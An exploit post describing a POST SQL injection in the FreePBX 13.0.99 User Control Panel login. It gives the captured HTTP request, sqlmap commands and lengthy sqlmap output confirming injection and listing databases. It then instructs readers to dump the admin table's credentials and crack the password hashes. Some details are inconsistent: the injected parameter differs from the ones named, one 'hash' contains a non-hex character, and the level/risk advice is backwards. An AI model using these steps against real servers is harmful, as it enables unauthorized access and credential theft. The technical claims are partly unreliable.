FreePBX 13.0.99 SQL Injection "POST" USING SQLMAP

1.  
2. # Exploit Title: [ SQL Injection]
3. # Vendor : FreePBX
4. # Date: [2016-10-09]
5. # Exploit Author: [αԋɱҽԃ αмєяιcαη] ** Skype: AhmedAmerican_ **
6. # Vendor Homepage: [https://www.freepbx.org/]
7. # Tested Version: [ FreePBX 13.0.99 ** Other versions may also be affected ** ]
8. # This Task Need SQLMAP : https://github.com/sqlmapproject/sqlmap/tarball/master
9.  
10.  
11. Following Vulnerable Detected UPON Manual GET/POST REQUEST FOR HTTP HEADERS
12. ---------------------------------------------------------------------------------------------------------------------------------------------------------
13. POST /ucp/index.php HTTP/1.1
14. Host: http://target ip/ or http://target ip:port/
15. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
16. Accept: application/json, text/javascript, */*; q=0.01
17. Accept-Language: en-US,en;q=0.5
18. Accept-Encoding: gzip, deflate
19. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
20. X-Requested-With: XMLHttpRequest
21. Referer: http://target ip/ucp/
22. Content-Length: 103
23. Cookie: lang=en_US; PHPSESSID=igq9g1s6lurkpciojt4dabbu71; __utma=90705823.772463779.1476023139.1476023139.1476023139.1; __utmc=90705823; __utmz=90705823.1476023139.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
24. Connection: keep-alive
25. token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login
26. --------------------------------------------------------------------------------------------------------------------------------------------------------------
27.  
28. Basically, This release simply infected with SQL INJECTION vulnerability Type: POST. With 3 parameter ( username & password & email ) For User Control Panel **/UCP/**
29. Make Sure THE UCP IS AVAILABLE BEFORE YOU START ( EXAMPLE : http://TARGET IP/ucp/ OR http://TARGET IP:PORT/ucp/
30. KINDLY BE INFORMED THAT EACH IP NEED A NEW TOKEN IN ORDER TO BYPASS THE DATA POST REQUEST.
31. -----------------------------------------------------------------------------------------------------------------------------------------------------------------
32. After Installing SQLMAP TOOL ON YOUR ROOT.
33.  
34. Proof of Concept:
35.  
36. root@American# cd SQLMAP
37. root@American:/SQLMAP# nano 1.txt
38. ( and insert into it ) :
39. POST /ucp/index.php HTTP/1.1
40. Host: http://target ip/ or http://target ip:port/
41. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
42. Accept: application/json, text/javascript, */*; q=0.01
43. Accept-Language: en-US,en;q=0.5
44. Accept-Encoding: gzip, deflate
45. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
46. X-Requested-With: XMLHttpRequest
47. Referer: http://target ip/ucp/
48. Content-Length: 103
49. Cookie: lang=en_US; PHPSESSID=igq9g1s6lurkpciojt4dabbu71; __utma=90705823.772463779.1476023139.1476023139.1476023139.1; __utmc=90705823; __utmz=90705823.1476023139.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
50. Connection: keep-alive
51. token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login
52. File Name to Write: 1.txt [ Wrote 13 line ]
53. root@American:/SQLMAP# ./sqlmap.py -r 1.txt -p "username,password,email"
54. ___
55. __H__
56. ___ ___["]_____ ___ ___ {1.0.10.19#dev}
57. |_ -| . [.] | .'| . |
58. |___|_ ["]_|_|_|__,| _|
59. |_|V |_| http://sqlmap.org
60. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and
61. federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
62. [*] starting at 20:26:50
63. [20:26:50] [INFO] parsing HTTP request from '1.txt'
64. [20:26:50] [WARNING] the testable parameter 'username,password,email' you provided is not into the GET
65. [20:26:51] [INFO] using '/home/American/sqlmap/output/i had remove target ip/session' as session file
66. [20:26:52] [INFO] resuming injection data from session file
67. [20:26:52] [WARNING] there is an injection in POST parameter 'username,password,email' but you did not provided it this time
68. [20:26:52] [INFO] testing connection to the target url
69. [20:26:53] [INFO] testing if the url is stable, wait a few seconds
70. [20:26:55] [INFO] url is stable
71. [20:33:13] [INFO] testing if POST parameter 'username,password,email' is dynamic
72. [20:33:14] [INFO] confirming that POST parameter 'username,password,email' is dynamic
73. [20:33:14] [INFO] POST parameter 'username,password,email' is dynamic
74. [20:33:14] [INFO] heuristics detected web page charset 'ascii'
75. [20:33:14] [WARNING] reflective value(s) found and filtering out
76. [20:33:14] [WARNING] heuristic (basic) test shows that POST parameter 'username,password,email' might be injectable
77. [20:33:15] [INFO] testing for SQL injection on POST parameter 'username,password,email'
78. [20:33:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
79. [20:33:18] [INFO] POST parameter 'username,password,email' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="the")
80. [20:33:18] [INFO] heuristics detected web page charset 'CP949'
81. [20:33:21] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
82. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
83. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
84. [20:33:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
85. [20:33:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
86. [20:33:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
87. [20:33:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
88. [20:33:27] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
89. [20:33:27] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
90. [20:33:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
91. [20:33:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
92. [20:33:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
93. [20:33:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
94. [20:33:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
95. [20:33:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
96. [20:33:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
97. [20:33:30] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
98. [20:33:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
99. [20:33:30] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
100. [20:33:31] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
101. [20:33:31] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
102. [20:33:31] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
103. [20:33:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
104. [20:33:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
105. [20:33:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
106. [20:33:31] [INFO] testing 'MySQL inline queries'
107. [20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
108. [20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
109. [20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
110. [20:33:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
111. [20:33:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
112. [20:33:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
113. [20:33:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
114. [20:33:43] [INFO] POST parameter 'username,password,email' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
115. [20:33:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
116. [20:33:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
117. [20:33:44] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
118. [20:33:45] [INFO] target URL appears to have 14 columns in query
119. [20:33:56] [INFO] POST parameter 'username,password,email' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
120. POST parameter 'username,email,password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
121. sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
122. ---
123. Parameter: username,password,email (POST)
124. Type: AND/OR time-based blind
125. Title: MySQL >= 5.0.12 AND time-based blind
126. Payload: token=1a543e82edd4d6a276ad0be4f1307822' AND SLEEP(30) -- &username=&password=&email=&quietmode=1&module=User&command=login rememberme=on ]
127. ---
128. [20:33:59] [INFO] the back-end DBMS is MySQL
129. web application technology: Apache
130. back-end DBMS: MySQL >= 5.0.12
131. [20:33:59] [INFO] fetching database names
132. [20:34:00] [INFO] the SQL query used returns 2 entries
133. [20:34:00] [INFO] retrieved: information_schema
134. [20:34:00] [INFO] retrieved: FreePBX
135. available databases [2]:
136. [*] FreePBX
137. [*] information_schema
138. [20:34:00] [INFO] fetched data logged to text files under '/home/American/.sqlmap/output/i had removed target ip'
139. [*] shutting down at 20:34:01
140.  
141. so now we are able to find the database, so you can view the database of FreePBX to see tables of admin for columns username,password and email and then you can dump it.
142.  
143. etc ( -D FreePBX -T admin -C username,password,email --dump and once you get it let sqlmap to try to crack the password hash or crack the password using any cracking site services )
144.  
145. or you can run the command directly without saving the post target by the following cmd
146.  
147. ./sqlmap.py -u "http://ip or ip:port/ucp/" --data="token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login" -p "username,password" --dbs
148.  
149. you can made --level=3 --risk=3 in case if you want to not stress the server.
150.  
151. and the result gonna be at the end that :
152. +———+———+———————————————+
153. | username | password |
154. +———+———+———————————————+
155. Admin | 9dab701b830129f80a3a40a5280b944a |
156. Saqisza | 6sb84d072ba41784289c8fb2098458d0 |
157.  
158. otherwise POST YOUR OWN INFO WHICH YOU WANNA LOG IN WITH AND WAIT TILL POSTING DONE BY SQLMAP
159. [token=27dfb08647231ad0ed08fd2bdab65fe1' AND SLEEP(30) -- username=American password=Letmego@ email=Ahmed.American@rocketmail.com rememberme=on ]
160.  
161.  
162. **************************SEE YOU ALL SOON αԋɱҽԃ αмєяιcαη *******************